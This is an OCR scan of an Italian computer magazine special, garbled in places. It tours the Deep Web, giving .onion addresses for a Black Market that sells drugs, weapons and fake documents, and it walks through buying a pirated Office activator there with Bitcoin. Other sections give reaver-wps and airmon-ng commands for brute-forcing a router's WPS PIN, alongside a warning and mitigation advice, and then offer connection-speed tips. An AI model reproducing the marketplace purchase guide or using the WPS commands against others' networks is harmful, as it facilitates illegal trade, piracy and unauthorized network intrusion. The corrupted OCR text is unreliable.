indirizzi del network Tor. Nella sezione Library 
possiamo scovare testi in diverse lingue e su 
diversi argomenti, che magari non riusciamo 
ad avere attraverso i normali canali di ricerca. 
Aprendo un sito, la prima cosa che balza al l'oc¬ 
chio è la struttura scarna. La caratteristica del 
Deep Web è intatti quella di non avere grafica, 
ma di ordinare le notizie come una lista di link 
Se consideriamo quanto detto in precedenza 
sulla tipologia di pagine che troviamo qui, la 
cosa è anche naturale. Comunque una volta 
che abbiamo trovato quello che cerchiamo, 
basta cliccarci sopra per apri rio o sa lvarlo. Per i 
testi, solitamente in formato PDF, è consigliato 


non aprirli direttamente nel browser per non 
compromettere l’anonimato della navigazione. 

Pronti per il nostro 
viaggio nel Deep Web 

Per le ricerche abbiamo usato The Abyss, rag¬ 
giungibile dalla Hidden Wiki. Anche in questo 
caso null’altro abbiamo che il campo per inserire 
la nostra chiave di ricerca. Abbiamo cercalo 
materiale sull’esoterismo per fare una prova e 
il risultato sono stati due indirizzi che ci hanno 
dato accesso ad un gruppo di discussione e 
scambio di materiale su Esoterismo e religione. 
Per accedere serve una registrazione e il forum 


stesso consiglia di usare un’e-mail fasulla! 
Troviamo anche molti forum di discussione 
su argomenti di varia umanità. Tornando alla 
Hidden Wiki, basta che andiamo all’omoni¬ 
ma sezione e scegliamo l’argomento che ci 
interessa, leggendo la breve descrizione che 
accompagna i link proposti. Tra i blog segna¬ 
liamo la Ecyclopedia Dramatica, un portale 
che racchiude informazioni e sezioni su diversi 
argomenti. Criccando sui portali proposti si 
accede a sezioni tematiche dove si trovano in¬ 
formazioni chealtrove non sono così facilmente 
reperibili. Abbiamo fatto un giro tra le sezioni 
sesso e hackering e in effetti tra testi, immagini, 
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video e guide, ce n’è per tutti i gusti. 1 server del 
Deep Web ospitano anche i database di molti 
enti scientifici e con una ricerca paziente si 
possono trovare studi e dati interessanti su 
diverse materie, dalla medicina all'energia. 
Anche Wikileaks tiene il proprio materiale 
sul Deep Web, per proteggerlo dagli attacchi 
di quanti vorrebbero mettere le mani sulle in¬ 
foi inazioni possedute dal por tale informativa 
Su Hidden Wiki si trovano diversi indirizzi di 
Wikileaks. tutti facilmente raggiungibili (gli 
ultimi aggiornamenti si trovano, ad esempio, 
su http://zbnnr7qzaxlk5tms.onion.to). 
Purtroppo il Deep Web è anche la sede di molte 


attività illecite. Abbiamo trovato il campiona¬ 
rio completo e possiamo affermare che qui, 
in molti casi, si va oltre le più pessimistiche 
e inimmaginabili possibilità. La conoscenza 
di questo aspetto del Deep Web parte anche 
in questi caso dalla lista si indirizzi registrati 
da Hidden Wiki. Poiché la maggior parte del¬ 
le attività illecite sono a fini di lucro, nulla di 
più facile che imbattersi in esse accedendo ai 
vari market che si trovano listati sul portale. 
In italiano c’è ben poco, ma il Black Market è 
diventato famoso per gli utenti nazionali. Si 
accede da TORDI R e scrivendo il nome del sito 
nel campo di ricerca. L’indirizzo comunque è 


http://5onwnspjvuk7awk.onion.to/index.php. 
Dopo u na breve registrazione, necessaria per le 
transazioni, eccoci dentro a questo supermer 
cato di merce di vario tipo. Tùtto è classificato 
per tipologia: non ci rimane che scegliere un 
prodotto. Operazionedifficile, quando andiamo 
a vedere le diverse sezioni; su Black Market è 
possibile trovare droga, armi, servizi legati 
al sesso, "lavanderie" per I soldi, documenti 
falsi e software pirata. Una volta individuato il 
prodotto, si accede alla sua scheda con un clic 
pertrovare una descrizione e il costo. Il prezzo 
è indicato in Bitcoin, la moneta elettronica di 
Internet, di cui parleremo più avanti. 


Nella fabbrica dei Bitcoin 


4 



Creiamo un nostro portafoglio virtuale eWallet e riempiamolo con i Bitcoin che avremo creato o ottenuti 
in regalo da altri. Ma senza fretta, perché sul Deep Web i tempi sono molto più dilatati che non nella rea 




js II portafoglio virtuale 


\ ì La prima operazione da compiere è la ere- 
:= : azione del portafoglio virtuale. Vista la triste 
sorte di Mybitcoin.com (un famoso eWallet on-line), 
scarichiamo il portafoglio invece di utilizzarne uno 
pronto all'uso Da littp.//bitcoin org scarichiamo il 
Client e installiamolo sul computer. 


Sincronizziamo i dati 


2 All'avvio del programma il firewall ne bloc- 
■ r cherà l'accesso alla Rete e chiederà l'auto¬ 
rizzazione per l'invio dei dati. Autorizziamo il traffico 
solo su reti private e attendiamone la sincronizza¬ 
zione. Terminata questa fase, il borsellino virtuale è 
pronto e dobbiamo solo cancario. 


acciainoci un regalo 


inizio, invece che investire denaro andia- 
no alla ricerca di Bitcoin in regalo. Scari 
chiamo Dragon'sTale, un mondo virtuale tipo Second 
lite, in cui le statue regalano moneta del posto, ovve¬ 
ro una trazione dei Bitcoin. Giocandoci sopra un 
messaggio ci chiederà di accettare il regalo. 



Trasferiamo i bitcoin 

4 Cucchiamo Search for a gift Un popup 
" • mostra l’entità del regalo, che in questo 
caso è di 2 BTM. Ogni BTM corrisponde a 0,001 
BTC. Giochiamo Yes per accettarlo. Per trasferire il 
denaro virtuale nel nostro eWallet torniamo sul Client 
Bitcoin e copiamo l’indirizzo per ricevere pagamenti 


^ Prendiamoci il denaro 

Kj : Giochiamo Ricevi monete Apparirà un 
-w? codice con un'etichetta modificabile Sele¬ 
zioniamo col tasto destro del mouse e cucchiamo 
Copia indirizzo nel menu che appare. Torniamo sul 
nostro avatar in Dragon's tale e clicchiamob sopra, 
scegliendo poi la voce Utility dal menu contestuate. 


Urtimi passaggi 

0 Nel menu Utility cucchiamo Withdraw bit- 
coins. Al posto dell'eventuale indirizzo indi¬ 
cato nel campo Sent to address incolliamo Tindiriz- 
* zo copiato dal nostro portafogli virtuale (Passo 5| e 
indichiamo l'importo del regalo. Nel box dei messag¬ 
gi troveremo la conferma dell'operazione 


Speciali Win Magazme 43 













































v 7 ri e bm artphone degli Hacker | Parliamo di... | Deep Web 


IBITCOIN SI ACQUISTANO CON LA POSTEPAY 


È possibile acquistare Bitcoin di¬ 
rettamente con la carta di credito 
prepagata più amata dal Web, la 
PostePay. Per farlo andiamo sul 
sito www.posteb.it. Non è richie¬ 
sta alcuna registrazione, ma solo 
l'indirizzo cui accreditare i Bitcoin 
acquistati. L'indirizzo e-mail da 
fornire nel campo La vostra email 
può essere anche fasullo. Inse¬ 
riamo il numero di Bitcoin che 
vogliamo comprare nel campo 
Quantità Nel campo Indirizzo 
Bitcoin di destinazione inseria¬ 
mo il nostro indirizzo nostro, che 


in Bitcoin non sono rivedibili e 
una volta effettuate non si può 
tornare indietro. Confermando 
le operazioni, una nuova finestra 
fornisce le indicazioni per effet¬ 
tuare il pagamento. Il pagamento 
avviene curiosamente attraverso 
una ricarica sulla PostePay di una 
persona di cui ci vengono forniti 


i dati, il codice fiscale e il numero 
della carta. Abbiamo due ore per 
provvedere alla ricarica, che deve 
essere dell'esatto importo richie¬ 
sto. Scadute le due ore, la transa¬ 
zione verrà annullata. Possiamo 
ricaricare in qualunque ufficio 
postale, tabaccheria, ricevitoria 
Sisal oppure on-line. 



computer, e si produce 1 Bitcoin ogni 10 minuti 
circa. Per fare acquisti su Black Market, ma in 
generale sul Deep Web (e da un po’ di tempo 
anche su alcuni siti "in chiaro”), è necessario 
aprire un deposito in Bitcoin. Le transazioni 
sono meno costose di quelle che transitano 
attraverso un istituto di credito perché i BTC 
vengono prodotti direttamente e direttamente 
spostati da persona a persona. Inoltre non è 
facile rintracciarne il percorso. Su Black Market, 
in altoa destra, troviamo la chiave per effettuare 
un deposito e possiamo tenere sotto controllo 
il nostro conto virtuale. Una volta effettuata la 
tran sazione non rimane che aspettareèsperare 
di non aver avuto una fregatura. 

Che fare, che dire? 



troviamo nell'eWallet Bitcoin. 
Copiamolo e incolliamolo. In 
questa fase bisogna fare molta 
attenzione, perché le transazioni 


Acquisti sicuri? 

Non siamo certo su eBay, dove il vertè 
l'acquirente sono registrati e rintracciabili, qTu| 
siamo su un supermercato del Deep Web! Le 
fregature sono sempre dietro l’angolo sul Web, 
figuriamoci qui. H allora ecco che troviamo, 
anche in questi spazi, la sezione dei feedback, 
dove gli utenti che hanno acquistato lasciano 
commenti sulla bontà della merce, sull’anoni¬ 
mato del pacchetto, sull'assenza dell’odore di 
erba e sulla velocità dell’evasione dell’ordine. 

1 feedback sono importanti perché è pratica- 
mente l'u nico modo che abbia mo per decidere 
se fidarci rii un venditore. Quando ne troviamo 
uno onesto (suona ridicolo detto qui), possia¬ 
mo anche salvarlo tra i nostri preferiti, cosi da 
ritrovarlo velocemente all’accesso successivo. 

Le transazioni in Bitcoin 

1 Bitcoin sono la mortela elettronica di Inter¬ 
net. Acquistarli non è complicato, ma richiede 
alcune operazioni preliminari. Innanzitutto 
c bene verificare dove è possibile acquistare 
risparmiando. Ci sono infatti differenti costi 
perogni Bitcoin. Dopo aver fatto questa ricerca 
ed aver individuato il sito che fa al caso nostro, 
dobbiamo creareun portafoglio virtuale in cui 
depositare le monete acquistate e in cui farci 
accreditare i Bitcoin derivanti da transazioni 
in cui noi siamo i venditori. I portafogli vir¬ 
tuali vengono offerti da diversi siti, ma anche 
in questo caso conviene, anzi è fondamentale, 
studiare prima le differenti offerte perchéèvero 
che tali spazi vengono offerti gratuitamente, 
ma è altrettanto vero che la moneta elettronica 
è cibo ghiotto per gli hacker che infatti han¬ 
no "rapinato” diversi siti che offrono questo 
servizio, facendo sparire una considerevole 



moledi moneta virtualeche, proprio per le sue 
ratteristiche, non è rintracciabile. Un caso 
flnkftnatico è quello di MybUcoirt.com. Una 
vtWraj&rabhiamo il portafoglio virtuale, che ci 
dà lo’spa^ >ihOÈ} accu imi lare moneta virtuale, 
un'e-mail «fismtjiftirizzo di deposito e 

che altro non è ciWiim chiivi^alfanumerica e 
la chiave per gl i accred ìmiysuflfa pedinarci 
i Bitcoin. Il verbo procuraree KM li" 
i Bitcoin possono essere acquistatile a ; 
con PostePay, ma possono essere anche™ 
in regalo su alcuni siti come ad esempio aldi ni* 
mondi virtuali, tipo http://Dragons.tl, in cui 
alcuni personaggi regalano Bitcoin. E infine, 
possono essere persino creati: in quest’ultimo 
caso, sedecidessimo di diventare Bitcoin Miner, 
avremmo come contropartita le transazioni 
gratuite e un piccolo guadagno. Per produrre 
Bitcoin non serve trasformarsi in poligrafico, 
ma basta usare l’energia elettrica e la CPU del 



In conclusione abbiamo fatto una carrellata 
di questo mondo sconosciuto. La difficoltà di 
rintracciare le transazioni e i siti che dimora¬ 
no su questa parte del Web rendono il lavoro 
delle forze dell’ordine difficile. Impossibile 
risalire ai compratori, impossibile risalire ai 
venditori, perogni transazione vera effettuata 
ne vengono create a migliaia fasulle rendendo 
inutile qualsiasi tentativo di tracciamento. Il 
gruppo di hacker che si sono riuniti sotto il 
nome d i Anonymous compie period ici attacchi 
ai siti pedo pornografici. Ma anche quid tutto 
inutile, basta fare il backup del sito su un altro 
server e si è nuovamente on-line. C'è ancora 
molto da dire su questo mondo che ha le sue 
>le e la sua moneta di scambio. Come si 
‘quest'ultima? Una moneta elettronica 
ìaria che pot reblu* portare ad enormi 
cttmi^gwffiìt i e che per questo non è ben vista 
daigowroi centrali. Qual è la posizione assun¬ 
ta dalla società civile nei confronti di questo 
mondo sommerso? Quali misure sono state 
adottate sin ora dalle nostre forze dell’ordine 
per fermare alcuni fenomeni che dimorano sul 
Deep Web? fi probabileche torneremo presto 
sull’argomento. 
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■ Il Black Market Reioaded è uno dei principali punti di partenza per gli acquisti sul Deep Web. 


44 Win Magazine Speciali 





















| Deep Web f Parliamo di... 



Acquisti nel Deep Web 

Fjnché si tratta di navigare nella Rete sommersa non si compie alcun reato. Il rischio di violare la legge, invece, 
si corre effettuando un acquisto. Quello che fanno i pirati ordinando, ad esempio, un keygen! 



^ La scelta è molto ampia 


^ Proviamo con un seriale 



■J j Per la nostra prova di acquisto andiamo sul 
—* * Black Market, secondo le indicazioni date in 
precedenza e sfogliamo il catalogo cercando tra le 
diverse categorie qualcosa da acquistare. Alla fine, 
optiamo per la categoria Software — 

su PC e nuovamente su Software. 


2 i Clicchiamo Microsoft Office 2007/2010/ 
2013 Activator La pagina dedicata fornisce 
la spiegazione di ciò che andiamo a comprare: un tool 
di attivazione di qualunque versione di Office. Basta 
avviarlo una volta ricevuto e permette anche di fare gli 
aggiornamenti. Costo 0.00002 BTC. 


> Spostiamo il denaro 

Cucchiaino Invia monete Incolliamo l’indiriz- 
■ ■, zo in Paga a e scegliamo un’etichetta per la 
transazione in modo che ne rimanga traccia. Inseriamo 
l'importo da trasferire, assicurandoci che la valuta sia il 
BTC e clicchiamo Spedisci. I Bitcoin vengono caricati 
sul nostro account. 


-v C’è anche una commissione 

g ; Ci viene chiesto di includere una commissio- 
ne, che servirà a retribuire i miner, ossia gli 
utenti che mettono a disposizione le proprie risorse in 
termini di energia elettrica e CPU per la produzione dei 
Bitcoin. Solitamente la commissione è di 0,005% e va 
impostata di volta in volta. 


Un account per ordina re 

3 Per procedere con l’acquisto carichiamo il 
nostro conto on-line su Black Market Sulla 
pagina del sito, in alto a destra, troviamo l'indirizzo 
cui l'account è collegato. Evidenziamolo e copiamolo 
Torniamo al portafoglio virtuale e spostiamo i Bitcoin 
direttamente al Black Market 



o-nopslr Rete kVmdow Mostra 

Com-wsone di transazione per kfi; è op sonale e contro, 
elaborate velocemente Le transazioni sono per la magge 
0 . 01 . 

Paga la commissione 0.0005) : jflTC 

Pai partire Bitoon afavvo del sistema 

. .’j-lvt’. ilnUlvurr at trv.Irtr.Ltn 


- Impostiamo la commissione 

Q^licchiamo sul menu Impostazioni/Opziom 
--'In Generale troviamo il campo in cui modifi¬ 
care la commissione, che di default è zero. Inseriamo 
la percentuale e clicchiamo Apply Modifichiamo l'im¬ 
porto del pagamento, considerando anche tale com¬ 
missione e diamo l ’OK alla transazione. 



Paghiamo il venditore 

"J ■ Caricato l'account possiamo procedere all’acquisto direttamente dal Black 
Market Ma dove troviamo l'indirizzo del venditore 7 Cliccando Informazio¬ 
ni sul venditore troviamo la chiave pubblica che, come spiegato neH'arbcoto. serve 
per individuare la destinazione della moneta virtuale. 





t*J**<'* > 




a Come ar riv a la merce? 

g : Sulle informazioni del prodotto, verifichiamo come e dove farlo arrivare a 
- destinazione. Nel nostro caso, avendo acquistato una chiave per sbloccare 
e validare un software, il venditore ce la invierà su un account di posta Tor. indican 
doci di solito anche un suo indirizzo preferito ■ 
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%T PC e Smartphone degli Hacker | Il Wi-Fi ha fatto crack! | 


ADSL gratis col 
crack del WPS 

Le nuove tecniche dei pirati per navigare a scrocco. Sei 
sicuro che il tuo router non sia a rischio? Scoprilo subito! 


Cosa ci 
occorre 


DISTRIBUZIONE UNUX 

BACKTRACK 
LINUX 5 

Gratuita 

Sito Intè'iiet: 

www.bacKtrack-linux.org 


TOOL DI CRACKING 

REAVER-WPS 


Gratuito 

Silo Internet: 

tìttp://coda google 
com/p/neaver-wps 


P er semplificare il più possibile 
la vita degli utenti informatici 
che debbono configurare l'ac¬ 
cesso ad un router Wi-Fi, i produttori 
hardware hanno implementato sui 
loro prodotti il protocollo di sicurezza 
WPS, acronimo di Wi-Fi Protec( 
Setup. L'obiettivo di questo sisteir 
quello di attivare automaticamente la' 
connessione tra il computer e l’Access 
Point richiedendo all’utente di digita¬ 
re solo un PIN (un codice numerico). 
Dopo questa prima connessione, le 
periferiche si scambieranno tutte le 
successive informazioni necessarie 
al collegamento, senza che sia richie¬ 
sto un ulteriore intervento umano. 
Detto così sembrerebbe un'opzione 
comodissima e proprio per questo 


motivo sono molte le periferiche che 
la implementano, ma purtroppo da 
poco tempo si c scoperta la possibi¬ 
lità di violare tale protocollo e questo 
significa che diventa possibile acce¬ 
dere alla rete senza autorizzazione c 
in relativamente poco tempo. 

in atto 

SenSfe^afteJroppo nei dettagli 
tecnici, lJvmmon 
do al sistema t(Ut 
sibili (un attacco 
forza bruta) fino 
trova quello giusto. Questo 
è di 8 cifre e quindi in linea teorie! 
pot rebbero essere i 108 ( 100 m i I io n i) 
combinazioni da provare; ma poiché 
il protocollo, inviata la quarta cifra, 




avvisa il Client se la prima parte del 
PIN ècorretta, il numerodi possibili 
sequenze scende a 11.000. Un valo¬ 
re molto basso che permette ad un 
qualsiasi computer, con l'ausilio di 
un apposito programma, di effet¬ 
tuare con successo l'identificazione 
del PIN in poche ore. Ovviamente 
non tutti i router Wi-Fi ne sono af¬ 
fetti, né quelli che implementano 
tale meccanismo lo rendono attivo 
di default. Inoltre alcuni router po¬ 
trebbero rendersi conto, dopo una 
serie di tentativi, che vi sia un attac- 
fc^so e quindi disabilitare tale 
ITzòfine. Vediamo allora di capire 
cune : unisona Ikttaccodi un ha¬ 
cker e sol®(k)ni adottare per 
correre ai rSafl^J 




MAI ATTACCARE 
LE RETI ALTRUI 


Ovviamente, grazi* si 
programmi reperibili in 
rete, e possibile provare 
in prima persona a vio¬ 
lare la propria rete, ma 
è importante ricordare 
che solo questa può 
essere oggetto di prova. 
In nessun caso si deve 
mai tentare di accedere 
alle reti di altri senza 
autorizzazione. Sembra 
scontato, ma è sempre 
bene ricordarlo! 


ECCO COME L HACKER SFERRA L'ATTACCO AD UNA RETE WI-FI 



teavei-wps 


Ad un malintenzionato basta un computer con 
GNU/Linux e qualche programma facilmente 
reperibile su Internet per violare la nostra rete in 
poche ore. Innanzitutto, il pirata scarica quindi 
un software in graao di implementare un at¬ 
tacco di tipo brute-force: quello più famoso ed 
efficiente negli attacchi alle reti Wi-Fi si chiama 
reaver-wps ed è open source, quindi compieta- 
mente gratuito. Dalla pagina del progetto http:// 
code.google.com/p/reaver-wps, il pirata clicca 
su Download per scaricare l'archivio compresso 
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in formato TAR.GZ. 

Il pirata provvede quindi a scompattare il pac¬ 
chetto con il comando tar xvfz reaver-1.4.tar.gz. 
Spostandosi nella cartella sre crea quindi l'ese¬ 
guibile digitando i comandi: Jconfìgure, make 
e sudo make instali, seguiti da Invio. Durante 
la fase di configurazione gli vengono mostrate 
eventuali librerie mancanti, cosicché può pro¬ 
cedere anche con la loro installazione. 

Prima di poter utilizzare il programma, il pirata 


imposta la scheda wireless del suo computer in 
una modalità detta "di monitor": in pratica, fa 
in modo che la scheda si metta in ascolto per 
intercettare i dati scambiati sulla rete Wi-Fi posta 
sotto attacco. Per raggiungere il suo scopo, il 
pirata installa il programma aircrack-ng che 
ha precedentemente scaricato dal sito www. 
aircrack-ng.org. Dopodiché, non gli rimane 
altro da fare che eseguire il comando airmon- 
ng start w/anO.Ogni router individuato dal 
software viene identificato, in maniera univoca. 



















| Il Wi-Fi ha fatto crack! | PC e Smartphone degli Hacker 
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aspettare che reaver-wps faccia il suo dovere. 
Per poter velocizzare la ricerca e fare in modo 
che l'attacco non venga bloccato, il pirata 
agisce anche su alcuni parametri aggiuntivi 
di reaver-wps, come ad esempio quello che 
permette di ridurre il ritardo tra l'invio di 
un pacchetto e l'altro. Per cono- 
scere tutti i parametri, gli basta IL; 
digitare il comando reaver senza , 

alcuna opzione. 




PREREQUISITI 

FONDAMENTALI 

Per poter eseguire reaver- 
wps è fondamentale che 
sul computer con GNU/ 
Limix siano presenti il 
sistema di sviluppo base, 
le librerie libfxapdevel 
e ujUte-devel, e che lo 
stesso abbia una scheda 
wireless compatibile. 

Per supplire alle man¬ 
canze software basta 
installare i programmi 
con il package manager 
della distribuzione, men 
tre per conoscere l'elenco 
delle schede che riescono 
a svolgere tale compito si 
può consultare la pagina 
Web www.winmagazine. 
itflmk/1339. 
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mediante un BSSID, cioè un indirizzo hardware 
non modificabile assegnato al suo hardware. 
Questo parametro è fondamentale per dirigere 
correttamente i pacchetti verso il destinata¬ 
rio prescelto. Tale valore si trova spesso su 
di un'etichetta del router stesso. Per poter 
attaccare il router, al programma reaver-wps 
il pirata deve solo indicare quale interfaccia 
(scheda di rete Wi-Fi) usare e l'identificativo 
BSSID estratto in precedenza. Il comando per 
fare ciò è molto semplice: reaver -i mono -b 
XX:XX:XX:XX:XX:XX dove alle X vanno sosti¬ 
tuiti i valori del BSSID. Una volta premuto 
Invio, al pirata non rimane altro da fare che 


Testa la sicurezza della tua Rete 

Per prima cosa bisogna scoprire se il proprio punto di accesso Wi-Fi è vulnerabile ad eventuali attacchi che 
sfruttino la debolezza del protocollo WPS e solo dopo provvedere eventualmente alla sua messa in sicurezza. 


WPS VufcwrsbMy T**r*g 




ttlIVJIl,' 

t«M 




-v II router usa il WPS? 

■J I Per scoprire se il router implementa il 


meccanisrfio di sicurezza basato sul 
WPS e se è vulnerabile, visitiamo una pagina 
Web che elenca i risultati di alcuni test di vul¬ 
nerabilità effettuati con reaver-wps. Dal sito 
www. wmmagazine.it/linK/1340 clicchiamo il 
link subito sotto la dicitura WPS Vulnerabili- 
ty Database. 


tfem Sfemwv? Sauri Atro. 


Google 


wpsvkjloom&Atv | 
wpS wirttfabiMy testino 
wps «AirwAO&Ty hnfcsyt 
wpa «jirwnrMttY scannar 

wps wAnofaodtfv «pois 
wps yiAnoratxMy notpesr 

wps nriT**rnt>4it spuria sirport «stremo 
wps vuRmkik>M\‘ sproodshoot 
wps «rinefobfMy «irport axtrama 

wps vUtearoMtv tool 


uttori hardware sono particolar- 
p ent^t^otiAlia sicurezza dei propri 
dispositivi^ i fflM dLche le procedu¬ 
re necessarie pf-r :®rJpilnroblema sia¬ 
no chiaramente spieg&i^w3afc M. ^pche 
i motori di ricerca ci possowjeu^ jfraiuto: 
basta cercare il nome d 
vulnerabilìty 


• imiiro Wif* N^tnp *>tW «imv 


a Disabilitiamo la funzione 

g Una delle soluzioni più sicure consl- 
- ~ ste nel disabilitare il protocollo WPS. 
La procedura differisce da modello a model¬ 
lo ma in genere bisogna collegarsi all'inter¬ 
faccia Web di gestione del router e cercare 
le impostazioni IVPS - PIN Nuovamente, è 
ie in questo caso il sito del produttore che 
a come procedere. 
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Super ADSL col CD 
di Win Magazine 

130 trucchi suggeriti dai nostri esperti per dare ancora più gas 
alla connessione Internet. Potrai così scaricare e condividere 
davvero di tutto alla massima velocità! 





ELEVATA 

MEDIA 

BASSA 


un’impressione o una realtà oggettiva. Poi¬ 
ché i siti possono avere dei problemi di len¬ 
tezza momentanea che non dipendono dal¬ 
la nostra connessione Internet, per verificar 
lo possiamo ricorrere ad un misuratore di 


WMI Ih* **$ 
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N ell'era digitale una delle cose che deve 
fare assolutamente un computer, un 
tablet o uno smartphone allegarsi a 
Internet nel modo più rapido, MUÈi'jàlfi e, 
possibilmente, economico! Per sbuffa 
meglio la nostratonnessione non è necesl 


essere esperti di reti e router, ma basta mettere 
in pratica tutta una serie di trucchi e accorgi¬ 
menti, facilissimi da applicare. Modificando 
ad esempio alcune impostazioni del registro 
di Windows e utilizzando i software giusti 
emo navigare in liete senza avvertire 


più alcun rallentamento, caricare siti, blog 
e portali in un batter d'occhio e scambiare 
file alla massima velocità sui canali peer to 
peer. Cosa aspettiamo allora? Ottimizziamo 
subito la nostra connessione e prepariamoci 
a sfrecciare in Rete! 


CS MISURARE 
V -7 LE PRESTAZIONI 

Il nostro browser ci mette un sacco di 
tempo a caricare le pagine Web dei nostri 
siti preferiti? In taluni casi potrebbe essere 
tutta colpa di un calo di prestazioni della 
nostra connessione Internet. Ecco come 
verificarlo in pochi clic. 

In una situazione del genere, prima di lan¬ 
ciarci in avventurose configurazioni del brow¬ 
ser, del router Wi-Fi o del registro di Win¬ 
dows è bene accertarsi se l’impressione di 
lentezza di navigazione che abbiamo sia solo 


%ie quello disponibile aH’indiriz- 
st.net. Una volta raggiunta 


no fare altro che 
1/èTEST per lari 
otremo vi¬ 
ri i 


l’home| 
cliccare suP 
ciare i test: dopò? 
sualizzare la velocità'! 
ad misurata. 


O TEST Di VELOCITÀ 
COL TELEFONINO! 

Il telefono o il tablet sono ottimi allea¬ 
ti per capire se la lentezza della nostra 
connessione Wi-Fi possa dipendere da 
una configurazione oppure un problema 
del computer o dalla rete. Vediamo come 
usarli. 

Se il nostro PC ci sembra lento o non riesce 
a collegarsi a un sito, proviamo a collegarci 
allo stesso hotspot Wi-Fi con un telefonino 


e tentiamo di ripetere la stessa navigazio¬ 
ne. Esistono poi applicazioni di misurazio¬ 
ne per la velocità per tutti i più diffusi te¬ 
lefoni™ (iPhone e Android) come quella di 
Speedtest Utilizziamole per testare la ve¬ 
locità di navigazione della rete anche se il 
PC non funziona! 


O ATTENTI AGLI ZERI! 

Quando ci colleghiamo a un 
hotspot Wi-Fi o a una rete via cavo, viene 
automaticamente assegnato un indirizzo 
IP per ogni dispositivo collegato. Se la 
connessione non va, è opportuno con¬ 
trollare se questa operazione è avvenuta 
senza problemi. 

Per verificare con Windows 7 se sia sta¬ 
to correttamente assegnato l’indirizzo IP al 
nostro PC, clicchiamo col tasto destro del 




► 
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File sharing col turbo 

Per sfruttare tutta la velocità di download di Win-eMule e pTorrent dobbiamo aprire le porte TCP e UDP del router. 
Con Simple Port Forwarding possiamo farlo in maniera completamente automatica. 



^ Sc egliam o il rou ter giusto ^ I parametri di accesso 



■J Dall’interfaccia principale di Win-eMule 
cucchiamo sul pulsante ID Premium per 
awiare Simple Port Forwarding, che avevamo 
precedentemente installato Selezioniar# Ifaliano 
in basso a sinistra, da 
lo in nostro possesso e cucchiamo su 


2 In Gateway controlliamo che l'indirizzo IP 

del router (nel caso di un Alice Pirelli Gate 
è 192.168 1. D sia corretto Inseriamo Usemame 
e Password di accesso al dispositivo Nella fine¬ 
stra Elenco di controllo cucchiamo Applica ora 
quali porte è necessario riderezionare. 


^ Il Mulo a briglia sciolta 

j|, Nel campo Indirizzo /P immettiamo quello 

- - che il router ha associato al PC su cui è 
installato Win-eMule (ad esempio. 192.168.1.2) 
e cucchiamo Aggiungi Ripetiamo la procedu 
ra per la porta UDP in Tipo scegliamo UDP e 
digitiamo la porta 62415 indicata in Win-eMule 
(Passo 3). 


^ Adesso tocca a Torren t 

Dall’interfaccia principale di Win-eMu¬ 
le cucchiamo su Sblocca uTorrent per 
avviare il Client che avevamo già installato sul 
PC. Accediamo al menu Opzioni/lmpostazioni. 
spostiamoci nella sezione Connessione e anno¬ 
tiamo il numero indicato in Porta usata per la 
connessione in entrata. 


Prendiamo la porta giusta 

3 Nella nuova schermata clicchiamo 
Aggiungi personale in Nome scriviamo 
eMulel e da Tipo selezioniamo TCP In Porta ini¬ 
ziale/finale scriviamo la porta TCP indicata nel 
menu Preferenze/Connessione/Connessione/ 
Porta del Client di Win-eMule 



0 : Torniamo in Simple Port Forwarding, clic- 
. " chiamo + in basso a destra e poi Aggiun¬ 
gi personale. In Nome digitiamo uTorrent , in 
Porta iniziale/finale inseriamo il numero annota¬ 
to al passo precedente (nel nostro caso, 14576 ) 
quindi clicchiamo su Aggiungi e chiudiamo Sim¬ 
ple Port Forwarding. 



(?) DECISAMENTE MEGLIO 
V UN"NUOVO"BROWSER 

Se la connessione sembra funzionare, gli IP sono assegnati correttamente 
e riusciamo a navigare dalla stessa rete, potrebbe essere che il problema 
risieda nel browser che stiamo utilizzando che, magari si è "intasato" con 
plug-in che danno problemi. Proviamo a installare e utilizzare un browser nuo¬ 
vo e veloce come Google Chrome o una nuova versione di Firefox e cerchiamo 
di navigare: se non risconteremo problemi, significa che il vecchio browser ha 
bisogno di una buona ripulita! 


mouse sulla voce del router al quale sia 
mo collegati (compare cliccando in basso 
a destra sull’icona del Wi Fi) e scegliamo 


la voce Stato Nei Dettagli vedremo com¬ 
parire un indirizzo IP in una forma simile a 
192.168.0.101. Qualora l’IP fosse invece 


composto da lutti zeri o da trattini, ciò vor¬ 
rebbe dire che probabilmente il router non 
ha riconosciuto il computer in rete. 
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O OCCHIO ALL’IP 
ESTERNO 

Se al nostro PC è stato correttamente as¬ 
segnato un indirizzo IP, ma nonostante 
questo ci sembra che la connessione non 
funzioni come dovuto o, per esempio, non 
si riesca a navigare in alcuni siti e a utiliz¬ 
zare sistemi di chat e di messaggistica, è 
opportuno verificare che dal router Wi-Fi 
o dalla connessione via cavo si riesca a 
“uscire” dalla rete domestica. 

Per farlo, proviamo a raggiungere il sito www. 
iplocatotion net e verifichiamo che l'indiriz¬ 
zo IP sia riconosciuto (molto probabilmente 
sarà diverso dall'Indirizzo IP della rete Wi-Fi 
interna) e che la località del nostro compu¬ 
ter sia corretta. 


O SPEGNI E RIACCENDI 

Molto probabilmente la maggior 
parte dei problemi che affliggono una con¬ 
nessione, compresa una possibile lentezza 
della navigazione o difficoltà di collegarsi 
a Internet o scaricare file dalle reti Bit- 
Torrent, sono solo temporanei o dovuti 
a coincidenze nell'apertura e chiusura 
di programmi che si sono bloccati. Per 
risolverli basta poco. 
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O DIAGNOSI 
DA WINDOWS 

Windows 7 e Windows Vista dispongono 
di un potente tool per verificare problemi e 
ottimizzazioni della connessione a Internet. 
Impariamo ad usarlo. 

Nel pannello delle proprietà della connessio¬ 
ne attiva, clicchiamo sul tasto Esegui Dia¬ 
gnosi per lanciare un analizzatore di con¬ 
nessione. Dopo qualche secondo (a vol¬ 
te può essere necessario qualche minuto) 
comparirà una finestra che riporta eventuali 
problemi riscontrati e indica alcuni accorgi¬ 
menti e operazioni che potrebbero permet¬ 
terci di ricollegarci alla rete e ottimizzarne 
le prestazioni 
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Se ci accorgiamb che In gfcstra connessio¬ 
ne non va, prima di 1 
rate, proviamo, in ordine, i „ 
browser e riaprirli, a scollegarci^! 

Wi-Fi e ricollegarci, a nawiare i 
spegnere e accendere il router. Non è det- ' 
to che il vecchio metodo del 'spegni e riac¬ 
cendi" non funzioni! 


O PULIZIE 
I Di PRIMAVERA 

Se la nostra navigazione Internet va lenta 
come una tartaruga, ciò potrebbe essere 
dovuto ai file che il browser memorizza 
in locale. Infatti le informazioni, tra file 
temporanei, immagini, animazioni, video, 
impostazioni personali e plug-in, possono 
essere davvero pensanti, addirittura decine 
di gigabyte! È opportuno pertanto svuotare 
la cache del browser. 

Con Internet Explorer, per esempio muovia¬ 
moci tra le opzioni del browser e ricerchia¬ 
